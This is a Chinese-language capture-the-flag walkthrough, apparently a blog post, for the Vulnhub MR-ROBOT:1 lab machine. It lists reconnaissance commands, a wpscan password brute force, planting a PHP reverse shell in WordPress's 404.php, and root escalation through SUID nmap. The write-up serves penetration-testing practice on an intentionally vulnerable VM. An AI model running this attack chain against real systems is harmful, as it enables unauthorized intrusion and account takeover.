看完这篇教你玩转靶机 MR-ROBOT: 1

Vulnhub介绍:

Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。

靶机下载:

官网:https://download.vulnhub.com/mrrobot/mrRobot.ovaicon-default.png?t=M276https://download.vulnhub.com/mrrobot/mrRobot.ova

废话不多说直接进入正题:

1.arp-scan -l  (我是内网nat扫描嗷,有桥接需求的可以直接输入netdiscover进行扫描)

2.nmap -sS -A -p- -n +靶机ip

3.dirb http://+靶机ip

4.访问robots.txt网页

就会发现一个txt和一个dic

我们访问txt得到第一个flag

5.访问另一个dic并下载它


查看它发现它可能是个字典

6.dirb http://+靶机ip(可以不用再扫一次翻到上面扫过的直接访问wp页面,我懒得翻又扫了一次)

访问wp-admin页面

弱密码访问发现并无效果

点击"lost your password"(底下灰色的东东看到了吗!!!)

随便输入一个用户名进行抓包

  

爆出用户名Elliot

7.nikto -h +靶机ip

发现有大量wp信息

所以我们接下来用wpscan爆破密码没有那么慢,上面的用户名已经被我们爆出来了,所以大可不必再用抓包来爆真的慢!!

wpscan --url http://+靶机ip -U elliot -P fsocity.dic

密码:ER28-0652

(爆破出来需要一个小时呜呜呜呜学校机子差飞了)

8.利用php反弹shell

cd /usr/share/webshells/php

cat php-reverse-shell.php

复制它粘贴到404.php并将ip改为本地ip还有端口,开启监听

然后访问http://+ip/wp-admin/404.php

让我们回到终端你发现你进去了

神奇吧

哈哈哈哈

这里有第二个key

可读需要解密

解密结果:abcdefghijklmnopqrstuvwxyz

9.切换身份读取key2

优化终端

python -c import pty;pty.spawn(/bin/sh)

提权

find / -perm -4000 2>/dev/null  (查找有SUID权限的文件)

这里发现有nmap可以提权我们用它进行提权

nmap -v

nmap --interactive

!sh

id

find / -name key-3-of-3.txt

cd /root/key-3-of-3.txt

cat key-3-of-3.txt    其实正确查看方式应该为cat key*

到这里就完成啦好玩吧!!!

  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值